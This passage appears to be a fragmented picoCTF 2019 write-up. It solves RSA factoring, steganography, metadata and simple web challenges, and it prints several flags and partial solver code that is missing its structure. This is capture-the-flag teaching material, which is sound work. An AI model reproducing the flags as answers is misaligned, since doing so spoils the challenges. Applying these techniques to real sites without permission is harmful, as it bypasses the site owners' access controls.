factors = [8680361201, 8810373757, 8879622217, 9279907993, 10593071891, 10722199157, 10723883981, 11096702983, 11202477151, 11216194933, 11502747821, 11747849147, 11916512249, 12266755343, 12342527563, 12657666379, 12946245071, 13198870877, 13567767419, 13687577677, 13759459261, 14809052347, 14840695949, 15173858627, 15417585367, 15654210233, 15797156117, 16087543081, 16300327081, 16311877493, 16463889749, 16653070583, 16751698741, 16845385849]
print(reduce((lambda x, y: x * y), factors) == n)
phi = 1
for f in factors:
phi *= (f-1)
d = inverse(e,phi)
m = pow(c,d,n)
Points: 500
Decoding the certificate (link) the important information is given
RSA Public Key [68:0d:58:fa:65:c4:fc:08:fa:45:55:37:9d:3d:e0:19:ec:29:d6:6c]
modulus: 11a4d45212b17f
public exponent: 10001
We see that n
is very, very small. We can factor this
n = 4966306421059967
p = 73176001
q = 67867967
Points: 50
Just unzip the file and the flag is in the image
So Meta
Points: 150
The flag is the “artist” of the image, found using exiftool file
Artist : picoCTF{s0_m3ta_74e57c5c}
What Lies Within
Points: 150
This is a steganography challenge. Looking at the LSB data of the file using zsteg we obtain:
b1,rgb,lsb,xy .. text: "picoCTF{h1d1ng_1n_th3_b1t5}"
Points: 150
Opening the file we see that it is a hex encoding of a file. The beginning shows that the file is a .png
and correctly converting the file we obtain the flag
Points: 250
We are given a text file encoded with two distinct whitespace characters. Replacing one with 0
and the other with 1
we get a binary representation of an ascii string
Decoding this binary to ascii, we obtain
5000 Forbes Ave, Pittsburgh, PA 15213
This is an SSTV puzzle. Using the audio, with an RX mode of scottie was just able to make out the flag
Points: 350
This pasta is up to no good. There MUST be something behind it.
Using stegsolve, we can see written on the image
Points: 50
Search through the resources of the linked site to find the flag commented out
<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 -->
/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */
/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?d76327a1} */
Points: 100
function verify() {
checkpass = document.getElementById("pass").value;
split = 4;
if (checkpass.substring(0, split) == 'pico') {
if (checkpass.substring(split*6, split*7) == '4454') {
if (checkpass.substring(split, split*2) == 'CTF{') {
if (checkpass.substring(split*4, split*5) == 'ts_p') {
if (checkpass.substring(split*3, split*4) == 'lien') {
if (checkpass.substring(split*5, split*6) == 'lz_2') {
if (checkpass.substring(split*2, split*3) == 'no_c') {
if (checkpass.substring(split*7, split*8) == 'a}') {
alert("Password Verified")
else {
alert("Incorrect password");
Piecing this together, we obtain the flag
where are the robots
Points: 100
Hint towards looking at robots.txt
Which hints towards
This page has the flag
Points: 200
Cleaning up the source
function verify() {
checkpass = document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')];
split = 0x4;
if (checkpass[_0x4b5b('0x2')](0x0, split * 0x2) == _0x4b5b('0x3')) {
if (checkpass[_0x4b5b('0x2')](0x7, 0x9) == '{n') {
if (checkpass[_0x4b5b('0x2')](split * 0x2, split * 0x2 * 0x2) == _0x4b5b('0x4')) {
if (checkpass[_0x4b5b('0x2')](0x3, 0x6) == 'oCT') {
if (checkpass[_0x4b5b('0x2')](split * 0x3 * 0x2, split * 0x4 * 0x2) == _0x4b5b('0x5')) {
if (checkpass['substring'](0x6, 0xb) == 'F{not') {
if (checkpass[_0x4b5b('0x2')](split * 0x2 * 0x2, split * 0x3 * 0x2) == _0x4b5b('0x6')) {
if (checkpass[_0x4b5b('0x2')](0xc, 0x10) == _0x4b5b('0x7')) {
} else {
Points: 200
Set user agent to “picobrowser” and visit the page to obtain the flag
Java Script Kiddie
Points: 400
Using the code from the source, together with the known 16 bytes of a png header
89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52
We can have a fairly ugly function which tells us the output
var bytes = [41, 117, 233, 27, 252, 188, 0, 146, 149, 206, 140, 223, 159, 37, 68, 82, 240, 74, 246, 255, 247, 0, 26, 8, 0, 69, 255, 6, 178, 248, 95, 108, 152, 241, 198, 71, 119, 10, 1, 182, 223, 0, 78, 68, 73, 23, 106, 228, 171, 46, 132, 114, 194, 0, 68, 190, 62, 0, 0, 13, 213, 1, 152, 35, 18, 80, 78, 2, 111, 73, 122, 252, 239, 120, 0, 0, 150, 66, 22, 146, 32, 0, 1, 191, 0, 9, 165, 234, 73, 14, 156, 237, 190, 72, 126, 40, 183, 0, 0, 110, 13, 29, 237, 198, 0, 96, 144, 163, 174, 192, 111, 188, 103, 16, 134, 153, 0, 192, 75, 0, 1, 106, 45, 27, 73, 75, 220, 223, 137, 57, 82, 139, 151, 21, 154, 10, 84, 132, 209, 248, 0, 55, 4, 85, 0, 157, 132, 255, 26, 94, 62, 114, 67, 92, 131, 241, 155, 106, 62, 247, 164, 174, 87, 49, 96, 99, 170, 65, 208, 234, 111, 71, 200, 45, 245, 24, 48, 198, 27, 112, 73, 170, 64, 41, 161, 71, 12, 58, 100, 27, 124, 221, 133, 59, 234, 87, 242, 206, 193, 15, 190, 245, 235, 49, 241, 198, 198, 223, 220, 17, 157, 223, 39, 11, 233, 137, 100, 184, 170, 136, 198, 15, 244, 189, 74, 77, 207, 15, 126, 23, 226, 63, 170, 99, 120, 37, 64, 99, 94, 102, 241, 13, 239, 160, 170, 6, 197, 121, 249, 62, 113, 124, 101, 189, 35, 190, 141, 143, 241, 126, 33, 63, 34, 170, 83, 17, 41, 132, 126, 66, 244, 24, 96, 143, 223, 106, 221, 37, 176, 111, 105, 249, 25, 0, 248, 253, 233, 246, 8, 191, 155, 132, 231, 2, 170, 146, 238, 231, 71, 235, 15, 245, 182, 160, 191, 49, 159, 45, 64, 162, 111, 41, 66, 153, 66, 11, 0, 71, 121, 17, 87, 239, 125, 211, 227, 211, 235, 87, 17, 172, 160, 205, 107, 126, 84, 158, 89, 45, 79, 157, 146, 132, 218, 132, 111, 255, 251, 82, 178, 253, 204, 254, 151, 150, 80, 181, 134, 81, 241, 39, 166, 23, 30, 150, 49, 234, 234, 76, 144, 64, 156, 245, 126, 174, 231, 34, 172, 104, 33, 89, 236, 187, 97, 70, 198, 217, 3, 255, 119, 31, 24, 136, 63, 234, 207, 234, 166, 151, 99, 252, 191, 156, 114, 233, 234, 245, 5, 214, 55, 191, 44, 114, 181, 123, 244, 24, 172, 250, 141, 244, 191, 21, 255, 252, 156, 29, 214, 191, 151, 245, 122, 77, 19, 66, 139, 202, 64, 90, 223, 222, 90, 24, 72, 156, 253, 91, 65, 184, 226, 23, 209, 6, 20, 223, 107, 79, 106, 14, 90, 186, 139, 11, 161, 244, 222, 249, 220, 227, 61, 229, 123, 171, 17, 61, 205, 190, 210, 208, 242, 189, 110, 21, 159, 160, 124, 214, 90, 69, 91, 126, 50, 134, 197, 31, 148, 236, 212, 163, 30, 73, 220, 236, 8, 191, 114, 206, 35, 190, 246, 150, 125, 111, 8, 254, 26, 10, 104, 169, 80, 88, 239, 196, 206, 234, 245, 90, 171, 59, 3, 176, 174, 243, 183, 249, 49, 214, 155, 92, 215, 1, 14, 207, 251, 8, 191, 153, 79, 177, 37, 194, 250, 179, 49, 243, 165, 70, 150, 99, 102, 184, 188, 96, 231, 227, 244, 60, 111, 233, 35, 155, 185, 247, 231, 20, 73, 160, 138, 255, 97, 200, 249, 239, 246, 234, 130, 93, 88, 183, 223, 45, 223, 115, 33, 89, 127, 5, 193, 69, 174, 207, 49, 252, 33, 13, 33, 214, 241, 219, 63, 127, 15, 112, 249, 177, 17, 225, 187, 61, 67, 248, 109, 115, 175, 105, 10, 200, 79, 167, 152, 100, 73, 144, 110, 91, 245, 24, 50, 117, 182, 253, 51, 211, 105, 39, 215, 22, 249, 249, 125, 93, 167, 220, 174, 253, 158, 61, 202, 121, 89, 99, 112, 131, 207, 214, 99, 83, 188, 166, 151, 49, 116, 8, 155, 239, 247, 31, 45, 39, 111, 63, 224, 78, 106, 207, 187, 143, 251, 127, 120, 247, 210, 220, 130, 211, 7, 209, 72, 173, 73, 227, 191, 23, 121, 222, 166, 131, 242, 5, 181, 124, 241, 147, 68, 122, 249, 45, 87, 89, 96, 130];
$.get("bytes", function(resp) {
bytes = Array.from(resp.split(" "), x => Number(x));
function assemble_png(u_in){
var LEN = 16;
var key = "0000000000000000";
var shifter;
if(u_in.length == LEN){
key = u_in;
var result = [];
for(var i = 0; i < LEN; i++){
shifter = key.charCodeAt(i) - 48;
for(var j = 0; j < (bytes.length / LEN); j ++){
result[(j * LEN) + i] = bytes[(((j + shifter) * LEN) % bytes.length) + i]
while(result[result.length-1] == 0){
result = result.slice(0,result.length-1);
return false;
u_in = "8442621862337500"
var desired = [137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82]
(16)[137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82]
Trial and error for all 16 bytes gives us the key
and using this password on the site, we are given a QR code. When scanned gives the flag
Java Script Kiddie 2
Points: 450
var bytes = [150, 142, 202, 248, 111, 246, 218, 255, 230, 162, 68, 114, 195, 254, 68, 170, 166, 26, 168, 39, 255, 252, 145, 255, 188, 207, 171, 223, 214, 78, 0, 49, 66, 96, 130, 229, 120, 109, 7, 137, 222, 63, 225, 255, 7, 0, 68, 191, 137, 80, 78, 90, 212, 227, 143, 2, 0, 120, 71, 73, 69, 72, 95, 255, 0, 0, 1, 199, 0, 163, 141, 81, 0, 0, 0, 0, 0, 192, 138, 65, 164, 0, 0, 62, 13, 0, 25, 127, 0, 0, 153, 13, 73, 65, 200, 250, 48, 16, 69, 0, 0, 10, 0, 55, 1, 0, 227, 0, 0, 55, 139, 128, 66, 142, 52, 71, 122, 0, 26, 0, 84, 0, 0, 237, 154, 63, 20, 174, 108, 185, 135, 114, 69, 73, 1, 0, 144, 120, 0, 81, 212, 91, 141, 0, 126, 149, 84, 2, 176, 134, 68, 10, 24, 3, 0, 13, 50, 227, 14, 82, 222, 120, 227, 127, 97, 143, 94, 114, 146, 144, 0, 49, 246, 166, 25, 108, 36, 34, 183, 55, 16, 136, 50, 65, 219, 170, 156, 192, 120, 36, 140, 220, 215, 177, 159, 153, 127, 159, 199, 202, 29, 167, 244, 128, 220, 124, 199, 145, 153, 159, 178, 146, 252, 139, 137, 7, 143, 48, 151, 243, 129, 216, 60, 146, 99, 252, 23, 141, 240, 187, 151, 177, 146, 241, 133, 255, 234, 222, 151, 124, 62, 127, 227, 169, 229, 36, 29, 241, 160, 228, 112, 0, 212, 250, 215, 55, 142, 205, 199, 5, 225, 134, 0, 28, 126, 179, 246, 185, 188, 142, 193, 192, 0, 112, 234, 67, 209, 249, 89, 152, 123, 22, 59, 167, 139, 60, 255, 203, 33, 62, 60, 241, 125, 61, 66, 71, 39, 7, 150, 250, 8, 80, 198, 223, 14, 29, 175, 55, 218, 249, 126, 138, 223, 160, 0, 162, 94, 254, 147, 230, 16, 234, 223, 248, 191, 197, 162, 145, 217, 248, 17, 254, 253, 121, 6, 157, 254, 109, 141, 223, 173, 64, 103, 24, 251, 242, 132, 62, 91, 29, 82, 152, 245, 185, 77, 202, 83, 202, 146, 175, 162, 109, 90, 247, 76, 103, 185, 187, 152, 127, 155, 119, 245, 71, 185, 203, 76, 168, 15, 229, 186, 172, 139, 17, 219, 32, 191, 108, 69, 217, 50, 195, 112, 192, 55, 70, 101, 39, 129, 86, 166, 111, 123, 47, 81, 75, 39, 52, 74, 212, 15, 85, 143, 212, 207, 127, 250, 111, 155, 30, 223, 121, 71, 186, 114, 77, 95, 147, 131, 214, 53, 100, 242, 165, 238, 228, 213, 181, 53, 144, 149, 88, 170, 4, 173, 55, 115, 96, 233, 219, 32, 244, 163, 127, 245, 14, 148, 202, 169, 237, 216, 69, 40, 127, 183, 93, 190, 124, 208, 127, 171, 148, 83, 127, 50, 116, 212, 95, 83, 233, 227, 243, 49, 252, 204, 69, 57, 58, 178, 49, 70, 217, 206, 135, 92, 210, 115, 13, 243, 2, 152, 175, 244, 5, 32, 146, 205, 126, 62, 27, 169, 201, 109, 32, 245, 191, 31, 143, 202, 248, 197, 223, 172, 63, 210, 137, 62, 205, 18, 226, 12, 200, 163, 190, 246, 224, 38, 196, 108, 77, 144, 84, 191, 182, 239, 203, 215, 126, 248, 252, 244, 44, 223, 254, 27, 206, 127, 54, 7, 211, 150, 87, 255, 111, 223, 224, 36, 181, 65, 135, 69, 195, 124, 83, 205, 183, 223, 19, 194, 56, 55, 133, 124, 223, 96, 101, 186, 103, 90, 171, 164, 39, 50, 109, 22, 192, 234, 87, 227, 162, 245, 21, 117, 1, 224, 229, 124, 118, 2, 88, 246, 197, 151, 235, 234, 140, 198, 0, 175, 87, 235, 215, 220, 75, 176, 57, 228, 150, 182, 120, 18, 53, 175, 239, 13, 67, 116, 192, 198, 198, 196, 185, 227, 83, 26, 255, 76, 101, 9, 207, 145, 71, 140, 254, 44, 106, 31, 143, 247, 94, 43, 86, 109, 49, 71, 62, 38, 251, 147, 139, 85, 76, 82, 184, 179, 196, 35, 249, 159, 62, 177, 252, 203, 57, 91, 117, 147, 124, 222, 28, 23, 255, 57, 130, 24, 149, 255, 92, 127, 71, 162, 91, 55, 48];
function assemble_png(u_in){
var LEN = 16;
var key = "00000000000000000000000000000000";
var shifter;
if(u_in.length == key.length){
key = u_in;
var result = [];
for(var i = 0; i < LEN; i++){
shifter = Number(key.slice((i*2),(i*2)+1));
for(var j = 0; j < (bytes.length / LEN); j ++){
result[(j * LEN) + i] = bytes[(((j + shifter) * LEN) % bytes.length) + i]
while(result[result.length-1] == 0){
result = result.slice(0,result.length-1);
// console.log(result.slice(0,16))
return result.slice(0,16);
var desired = [137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82]
var test = "30303070506070905a6b9c5d50302e90";
result = assemble_png(test)
// 3
// 3
// 3
// 7
// 5
// 6
// 7
// 9
// 3,4,5
// 4,5,6,7
// 4,7,8,9
// 5,9
// 5
// 3
// 0,2
// 9
// 30303070506070905a6b9c5d50302e90